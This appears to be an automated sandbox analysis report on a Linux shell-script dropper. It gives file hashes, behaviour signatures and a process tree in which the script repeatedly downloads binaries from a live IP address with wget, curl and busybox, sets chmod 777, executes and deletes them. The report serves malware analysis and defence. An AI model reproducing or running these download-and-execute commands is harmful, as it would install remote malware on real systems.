Analysis
-
max time kernel
12s -
max time network
131s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240611-en -
resource tags
arch:amd64, arch:i386, image:ubuntu1804-amd64-20240611-en, kernel:4.15.0-213-generic, locale:en-us, os:ubuntu-18.04-amd64, system -
submitted
21/11/2024, 04:06
Static task
static1
Behavioral task
behavioral1
Sample
2efc3a0b95b0f47a391caeea7d0be6103ec13b915886586598849bb1a6a79d94.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
2efc3a0b95b0f47a391caeea7d0be6103ec13b915886586598849bb1a6a79d94.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
2efc3a0b95b0f47a391caeea7d0be6103ec13b915886586598849bb1a6a79d94.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
2efc3a0b95b0f47a391caeea7d0be6103ec13b915886586598849bb1a6a79d94.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
2efc3a0b95b0f47a391caeea7d0be6103ec13b915886586598849bb1a6a79d94.sh
-
Size
10KB
-
MD5
2c8ee73ff481383ca124810fef8653b1
-
SHA1
2f0045a1346635e0b97b189a217d60329572ee9c
-
SHA256
2efc3a0b95b0f47a391caeea7d0be6103ec13b915886586598849bb1a6a79d94
-
SHA512
a4cf9a0c5f3fcb4bbc802490023c07e2cdfe73a8a6d3d4903e7e952967325270f6f4a0bf912b58844b8655e30ba7832a39dc377a73ed4443b77740b6584ad8ad
-
SSDEEP
192:mrPM5ZTjn81dBLvdLvgaD6DGDN2uVFxFxFcj/flNzu7ui07gQ27wgRNKW5z7MUzm:jiC2N2uKu4OxTHC2N2uwCo
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
-
Executes dropped EXE 28 IoCs
-
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/2efc3a0b95b0f47a391caeea7d0be6103ec13b915886586598849bb1a6a79d94.sh/tmp/2efc3a0b95b0f47a391caeea7d0be6103ec13b915886586598849bb1a6a79d94.sh1⤵PID:1511
-
/bin/rm/bin/rm bins.sh2⤵PID:1512
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY2⤵PID:1513
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY2⤵
- Writes file to tmp directory
PID:1514
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY2⤵PID:1519
-
-
/bin/chmodchmod 777 jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY2⤵
- File and Directory Permissions Modification
PID:1520
-
-
/tmp/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY./jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY2⤵
- Executes dropped EXE
PID:1521
-
-
/bin/rmrm jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY2⤵PID:1522
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD2⤵PID:1523
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD2⤵
- Writes file to tmp directory
PID:1524
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD2⤵PID:1525
-
-
/bin/chmodchmod 777 vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD2⤵
- File and Directory Permissions Modification
PID:1526
-
-
/tmp/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD./vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD2⤵
- Executes dropped EXE
PID:1527
-
-
/bin/rmrm vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD2⤵PID:1528
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa2⤵PID:1529
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa2⤵
- Writes file to tmp directory
PID:1530
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa2⤵PID:1531
-
-
/bin/chmodchmod 777 vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa2⤵
- File and Directory Permissions Modification
PID:1532
-
-
/tmp/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa./vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa2⤵
- Executes dropped EXE
PID:1533
-
-
/bin/rmrm vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa2⤵PID:1534
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx2⤵PID:1535
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx2⤵
- Writes file to tmp directory
PID:1536
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx2⤵PID:1537
-
-
/bin/chmodchmod 777 I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx2⤵
- File and Directory Permissions Modification
PID:1538
-
-
/tmp/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx./I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx2⤵
- Executes dropped EXE
PID:1539
-
-
/bin/rmrm I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx2⤵PID:1540
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL2⤵PID:1541
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL2⤵
- Writes file to tmp directory
PID:1542
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL2⤵PID:1543
-
-
/bin/chmodchmod 777 MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL2⤵
- File and Directory Permissions Modification
PID:1544
-
-
/tmp/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL./MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL2⤵
- Executes dropped EXE
PID:1545
-
-
/bin/rmrm MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL2⤵PID:1546
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I2⤵PID:1547
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I2⤵
- Writes file to tmp directory
PID:1548
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I2⤵PID:1549
-
-
/bin/chmodchmod 777 zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I2⤵
- File and Directory Permissions Modification
PID:1550
-
-
/tmp/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I./zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I2⤵
- Executes dropped EXE
PID:1551
-
-
/bin/rmrm zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I2⤵PID:1552
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo2⤵PID:1553
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo2⤵
- Writes file to tmp directory
PID:1554
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo2⤵PID:1555
-
-
/bin/chmodchmod 777 ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo2⤵
- File and Directory Permissions Modification
PID:1556
-
-
/tmp/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo./ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo2⤵
- Executes dropped EXE
PID:1557
-
-
/bin/rmrm ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo2⤵PID:1558
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa2⤵PID:1559
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa2⤵
- Writes file to tmp directory
PID:1560
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa2⤵PID:1561
-
-
/bin/chmodchmod 777 YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa2⤵
- File and Directory Permissions Modification
PID:1562
-
-
/tmp/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa./YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa2⤵
- Executes dropped EXE
PID:1563
-
-
/bin/rmrm YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa2⤵PID:1564
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a2⤵PID:1565
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a2⤵
- Writes file to tmp directory
PID:1566
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a2⤵PID:1567
-
-
/bin/chmodchmod 777 Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a2⤵
- File and Directory Permissions Modification
PID:1568
-
-
/tmp/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a./Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a2⤵
- Executes dropped EXE
PID:1569
-
-
/bin/rmrm Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a2⤵PID:1570
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp2⤵PID:1571
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp2⤵
- Writes file to tmp directory
PID:1572
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp2⤵PID:1573
-
-
/bin/chmodchmod 777 MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp2⤵
- File and Directory Permissions Modification
PID:1574
-
-
/tmp/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp./MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp2⤵
- Executes dropped EXE
PID:1575
-
-
/bin/rmrm MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp2⤵PID:1576
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR2⤵PID:1577
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR2⤵
- Writes file to tmp directory
PID:1578
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR2⤵PID:1579
-
-
/bin/chmodchmod 777 Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR2⤵
- File and Directory Permissions Modification
PID:1580
-
-
/tmp/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR./Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR2⤵
- Executes dropped EXE
PID:1581
-
-
/bin/rmrm Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR2⤵PID:1582
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p2⤵PID:1583
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p2⤵
- Writes file to tmp directory
PID:1584
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p2⤵PID:1585
-
-
/bin/chmodchmod 777 hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p2⤵
- File and Directory Permissions Modification
PID:1586
-
-
/tmp/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p./hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p2⤵
- Executes dropped EXE
PID:1587
-
-
/bin/rmrm hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p2⤵PID:1588
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA2⤵PID:1589
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA2⤵
- Writes file to tmp directory
PID:1590
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA2⤵PID:1591
-
-
/bin/chmodchmod 777 W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA2⤵
- File and Directory Permissions Modification
PID:1592
-
-
/tmp/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA./W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA2⤵
- Executes dropped EXE
PID:1593
-
-
/bin/rmrm W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA2⤵PID:1594
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY2⤵PID:1595
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY2⤵
- Writes file to tmp directory
PID:1596
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY2⤵PID:1597
-
-
/bin/chmodchmod 777 RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY2⤵
- File and Directory Permissions Modification
PID:1598
-
-
/tmp/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY./RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY2⤵
- Executes dropped EXE
PID:1599
-
-
/bin/rmrm RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY2⤵PID:1600
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo2⤵PID:1601
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo2⤵
- Writes file to tmp directory
PID:1602
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo2⤵PID:1603
-
-
/bin/chmodchmod 777 ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo2⤵
- File and Directory Permissions Modification
PID:1604
-
-
/tmp/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo./ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo2⤵
- Executes dropped EXE
PID:1605
-
-
/bin/rmrm ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo2⤵PID:1606
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa2⤵PID:1607
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa2⤵
- Writes file to tmp directory
PID:1608
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa2⤵PID:1609
-
-
/bin/chmodchmod 777 YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa2⤵
- File and Directory Permissions Modification
PID:1610
-
-
/tmp/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa./YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa2⤵
- Executes dropped EXE
PID:1611
-
-
/bin/rmrm YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa2⤵PID:1612
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a2⤵PID:1613
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a2⤵
- Writes file to tmp directory
PID:1614
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a2⤵PID:1615
-
-
/bin/chmodchmod 777 Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a2⤵
- File and Directory Permissions Modification
PID:1616
-
-
/tmp/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a./Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a2⤵
- Executes dropped EXE
PID:1617
-
-
/bin/rmrm Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a2⤵PID:1618
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp2⤵PID:1619
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp2⤵
- Writes file to tmp directory
PID:1620
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp2⤵PID:1621
-
-
/bin/chmodchmod 777 MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp2⤵
- File and Directory Permissions Modification
PID:1622
-
-
/tmp/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp./MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp2⤵
- Executes dropped EXE
PID:1623
-
-
/bin/rmrm MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp2⤵PID:1624
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR2⤵PID:1625
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR2⤵
- Writes file to tmp directory
PID:1626
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR2⤵PID:1627
-
-
/bin/chmodchmod 777 Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR2⤵
- File and Directory Permissions Modification
PID:1628
-
-
/tmp/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR./Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR2⤵
- Executes dropped EXE
PID:1629
-
-
/bin/rmrm Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR2⤵PID:1630
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p2⤵PID:1631
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p2⤵
- Writes file to tmp directory
PID:1632
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p2⤵PID:1633
-
-
/bin/chmodchmod 777 hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p2⤵
- File and Directory Permissions Modification
PID:1634
-
-
/tmp/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p./hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p2⤵
- Executes dropped EXE
PID:1635
-
-
/bin/rmrm hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p2⤵PID:1636
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA2⤵PID:1637
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA2⤵
- Writes file to tmp directory
PID:1638
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA2⤵PID:1639
-
-
/bin/chmodchmod 777 W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA2⤵
- File and Directory Permissions Modification
PID:1640
-
-
/tmp/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA./W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA2⤵
- Executes dropped EXE
PID:1641
-
-
/bin/rmrm W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA2⤵PID:1642
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY2⤵PID:1643
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY2⤵
- Writes file to tmp directory
PID:1644
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY2⤵PID:1645
-
-
/bin/chmodchmod 777 RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY2⤵
- File and Directory Permissions Modification
PID:1646
-
-
/tmp/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY./RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY2⤵
- Executes dropped EXE
PID:1647
-
-
/bin/rmrm RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY2⤵PID:1648
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY2⤵PID:1649
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY2⤵
- Writes file to tmp directory
PID:1650
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY2⤵PID:1651
-
-
/bin/chmodchmod 777 jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY2⤵
- File and Directory Permissions Modification
PID:1652
-
-
/tmp/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY./jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY2⤵
- Executes dropped EXE
PID:1653
-
-
/bin/rmrm jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY2⤵PID:1654
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD2⤵PID:1655
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD2⤵
- Writes file to tmp directory
PID:1656
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD2⤵PID:1657
-
-
/bin/chmodchmod 777 vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD2⤵
- File and Directory Permissions Modification
PID:1658
-
-
/tmp/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD./vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD2⤵
- Executes dropped EXE
PID:1659
-
-
/bin/rmrm vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD2⤵PID:1660
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa2⤵PID:1661
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa2⤵
- Writes file to tmp directory
PID:1662
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa2⤵PID:1663
-
-
/bin/chmodchmod 777 vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa2⤵
- File and Directory Permissions Modification
PID:1664
-
-
/tmp/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa./vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa2⤵
- Executes dropped EXE
PID:1665
-
-
/bin/rmrm vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa2⤵PID:1666
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx2⤵PID:1667
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx2⤵
- Writes file to tmp directory
PID:1668
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx2⤵PID:1669
-
-
/bin/chmodchmod 777 I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx2⤵
- File and Directory Permissions Modification
PID:1670
-
-
/tmp/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx./I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx2⤵
- Executes dropped EXE
PID:1671
-
-
/bin/rmrm I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx2⤵PID:1672
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL2⤵PID:1673
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL2⤵
- Writes file to tmp directory
PID:1674
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL2⤵PID:1675
-
-
/bin/chmodchmod 777 MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL2⤵
- File and Directory Permissions Modification
PID:1676
-
-
/tmp/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL./MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL2⤵
- Executes dropped EXE
PID:1677
-
-
/bin/rmrm MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL2⤵PID:1678
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I2⤵PID:1679
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I2⤵
- Writes file to tmp directory
PID:1680
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I2⤵PID:1681
-
-
/bin/chmodchmod 777 zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I2⤵
- File and Directory Permissions Modification
PID:1682
-
-
/tmp/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I./zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I2⤵
- Executes dropped EXE
PID:1683
-
-
/bin/rmrm zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I2⤵PID:1684
-
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
153B
MD5
998368d7c95ea4293237f2320546e440
SHA1
30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256
533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512
648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97